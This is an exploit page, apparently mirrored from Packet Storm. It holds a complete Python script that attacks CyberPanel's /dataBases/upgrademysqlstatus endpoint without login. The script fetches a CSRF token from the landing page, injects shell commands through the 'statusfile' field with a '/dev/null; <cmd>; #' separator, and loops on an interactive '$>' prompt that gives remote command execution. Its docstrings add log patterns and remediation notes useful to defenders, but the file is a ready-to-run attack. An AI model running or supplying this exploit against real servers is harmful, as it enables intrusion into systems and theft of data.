CyberPanel upgrademysqlstatus Arbitrary Command Execution
2024-11-7 23:25:11 Author: packetstormsecurity.com

import httpx 
import sys

def get_CSRF_token(client):
    """Return the ``csrftoken`` cookie the panel sets on a plain ``GET /``.

    This script performs no login before the call, so the token is one
    the server hands out on an unauthenticated page load.

    Args:
        client: HTTP client bound to the panel's base URL (an
            ``httpx.Client`` in this script).

    Returns:
        The value of the ``csrftoken`` cookie from the response.

    Raises:
        KeyError: If the response carries no ``csrftoken`` cookie.
    """
    landing_page = client.get("/")
    return landing_page.cookies['csrftoken']

def pwn(client, CSRF_token, cmd):
    """PUT the crafted body to ``/dataBases/upgrademysqlstatus`` and return ``requestStatus``.

    The ``statusfile`` field, which by its name should hold a file path,
    is filled with ``/dev/null; <cmd>; #``: shell separators around the
    command and a trailing comment marker. The server-side handler is not
    shown on this page; presumably it places the field into a shell
    command line without escaping (confirm against the panel source).

    Review notes for defenders:
      * This script sends no credentials; only the CSRF token fetched
        from the landing page accompanies the request.
      * In web or proxy logs the pattern is a PUT to this path whose JSON
        ``statusfile`` contains ``;``, ``#`` or other shell
        metacharacters.
      * The server-side remedy is to validate ``statusfile`` as a path,
        avoid building shell command lines from request fields, and
        require an authenticated session on the endpoint; operators
        should install the vendor's fixed release (version not given on
        this page) and keep the panel port off untrusted networks.

    Args:
        client: HTTP client bound to the panel's base URL.
        CSRF_token: Token sent in both the ``X-CSRFToken`` header and the
            JSON body.
        cmd: Text inserted into the ``statusfile`` field by plain string
            formatting (no JSON encoder is used).

    Returns:
        The ``requestStatus`` value of the JSON reply.
    """
    request_headers = {
        "X-CSRFToken": CSRF_token,
        "Content-Type":"application/json",
        "Referer": str(client.base_url)
    }

    body = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)

    reply = client.put(
        "/dataBases/upgrademysqlstatus",
        headers=request_headers,
        data=body,
    )
    return reply.json()["requestStatus"]

def exploit(client, cmd):
    """Perform one token fetch plus one PUT and print the returned field.

    Every call produces two requests in the target's access log: a
    ``GET /`` (made by ``get_CSRF_token``) followed by the PUT made by
    ``pwn``. The value printed is whatever ``pwn`` returns, i.e. the
    ``requestStatus`` field of the JSON reply.

    Args:
        client: HTTP client bound to the panel's base URL.
        cmd: Text passed through to ``pwn`` unchanged.
    """
    token = get_CSRF_token(client)
    print(pwn(client, token, cmd))

if __name__ == "__main__":
    # The panel's base URL is the script's only command-line argument.
    # verify=False switches off TLS certificate verification, so the
    # client will talk to hosts with self-signed or mismatched
    # certificates.
    client = httpx.Client(base_url=sys.argv[1], verify=False)

    # Endless prompt: each line typed is handed to exploit(), which makes
    # a fresh GET / and PUT pair for it. The loop has no exit condition
    # of its own.
    while True:
        exploit(client, input("$> "))


文章来源: https://packetstormsecurity.com/files/182539/cyberpanel-exec.txt